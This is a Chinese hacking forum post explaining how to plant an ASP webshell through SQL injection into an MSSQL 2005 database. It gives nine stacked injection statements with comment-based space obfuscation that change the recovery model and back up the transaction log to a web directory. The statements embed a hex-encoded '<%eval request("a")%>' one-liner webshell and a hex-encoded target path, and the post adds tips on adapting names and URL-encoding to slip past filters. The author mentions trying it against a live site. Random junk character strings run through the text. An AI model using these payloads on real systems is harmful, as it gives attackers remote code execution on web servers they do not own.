mssql2005 DB权限导出一句话

admin

网站路径也搞到了，本想使用差异备份，在数据库日志中插入一句话，然后备份到网站目录下拿shell的，估计是用户没有备份数据库的权限，但使用MSSQL2000的备份方法根本行不通，后来才想到MSSQL2005的备份和MSSQL2000有点不同。

0 ^- V( T0 y* K/ w
% z% `' _* d5 O9 f2 }+ Y后来在网上搜半天没有找到具体的备份语句，后来在群求助，小冰才发我了具体的利用语句，但贴出来的文章貌似没啥水准，大家都知道手工差异备份是自己需要修改数据库名和网站路径的，但那个文章中对语句没有做任何解释，无奈之下我只好自己尝试了，虽然测试的网站没有成功拿下shell，单语句是没有错误的，我在本地的MSSQL2005的查询分析器中测试通过了，再次特将语句整理出来分享个大家，并做好详细的解释说明，首先来贴出语句。

3 ^1 t2 y4 z( q1 S第一步
# [+ M9 N. y8 U6 b;alter/**/database/**/[Hospital]/**/set/**/recovery/**/full--
. p% V# R6 J% e  }, i
3 S  [' w( P  l第二步：
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/database/**/[Hospital]/**/to/**/disk=@d/**/with/**/init--

第三步
;drop/**/table/**/[itpro]--

5 C& ~) E6 R  X; ?, N& w第四步
;create/**/table/**/[itpro]([a]/**/image)--
, p% ^) m8 O( B) a7 z- Y7 Y
: B6 W+ [0 t; r" w第五步
4 L1 x5 _+ U& o" Q" @4 k- D;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/log/**/[Hospital]/**/to/**/disk=@d/**/with/**/init--
8 V' B7 A8 {4 K" a  k5 }
第六步
) M9 K1 s: g: g;insert/**/into/**/[itpro]([a])/**/values(0x3C25657865637574652872657175657374282261222929253EDA)--
1 W. t* n% V# `0 t3 }
第七步
) N- |2 T7 s. E5 K;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x65003A005C007700650062005C007A002E00610073007000/**/backup/**/log/**/[Hospital]/**/to/**/disk=@d/**/with/**/init--
- w7 x# f5 w" o/ t1 m9 Q
第八步
4 M0 e" |9 C0 e- F; g- f;drop/**/table/**/[itpro]--

& V; d# q5 b- c- ]" ?' f( k4 `第九步
4 e8 J. [) ^+ c8 R* _;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/log/**/[Hospital]/**/to/**/disk=@d/**/with/**/init--
& c2 L( q) H( X0 k! G( z& |2 y
其中红色的“Hospital”既是数据库名，这个要根据自己的情况来修改，然后黄色的“0x3C25657865637574652872657175657374282261222929253EDA”是一句话“<%eval request("a")%>”的内容，橙色的“0x65003A005C007700650062005C007A002E00610073007000”为备份的路径“e:\web\z.asp”，都是使用的SQL_En的格式，另外第三步大可以不需要！他是删除itpro的表，如果第一次的话这个表是不存在的，就会提示无权限的信息。另外在语句“disk=@d”的地方可以将“=”更换成“%3D”，就是使用URL编码。“/**/”就等于空格了，这个大家在学习注入的过程中应该了解，也可以更换成“%20”。